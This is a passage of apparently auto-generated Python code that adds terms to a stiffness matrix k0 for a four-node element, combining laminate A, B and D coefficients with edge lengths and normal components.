k0[i2*dof+3, i4*dof+4] += Ac*((D12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+4, i1*dof+0] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+4, i1*dof+1] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+4, i1*dof+3] += Ac*((D12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+4, i1*dof+4] += Ac*((D22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+4, i2*dof+0] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+4, i2*dof+1] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+4, i2*dof+3] += Ac*((D12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+4, i2*dof+4] += Ac*((D22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+4, i3*dof+0] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+4, i3*dof+1] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+4, i3*dof+3] += Ac*((D12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+4, i3*dof+4] += Ac*((D22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+4, i4*dof+0] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+4, i4*dof+1] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+4, i4*dof+3] += Ac*((D12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+4, i4*dof+4] += Ac*((D22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+0, i1*dof+0] += Ac*((A11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+0, i1*dof+1] += Ac*((A12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+0, i1*dof+3] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+0, i1*dof+4] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+0, i2*dof+0] += Ac*((A11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+0, i2*dof+1] += Ac*((A12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+0, i2*dof+3] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+0, i2*dof+4] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+0, i3*dof+0] += Ac*((A11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+0, i3*dof+1] += Ac*((A12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+0, i3*dof+3] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+0, i3*dof+4] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+0, i4*dof+0] += Ac*((A11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+0, i4*dof+1] += Ac*((A12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+0, i4*dof+3] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+0, i4*dof+4] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+1, i1*dof+0] += Ac*((A12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+1, i1*dof+1] += Ac*((A22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+1, i1*dof+3] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+1, i1*dof+4] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+1, i2*dof+0] += Ac*((A12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+1, i2*dof+1] += Ac*((A22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+1, i2*dof+3] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+1, i2*dof+4] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+1, i3*dof+0] += Ac*((A12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+1, i3*dof+1] += Ac*((A22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+1, i3*dof+3] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
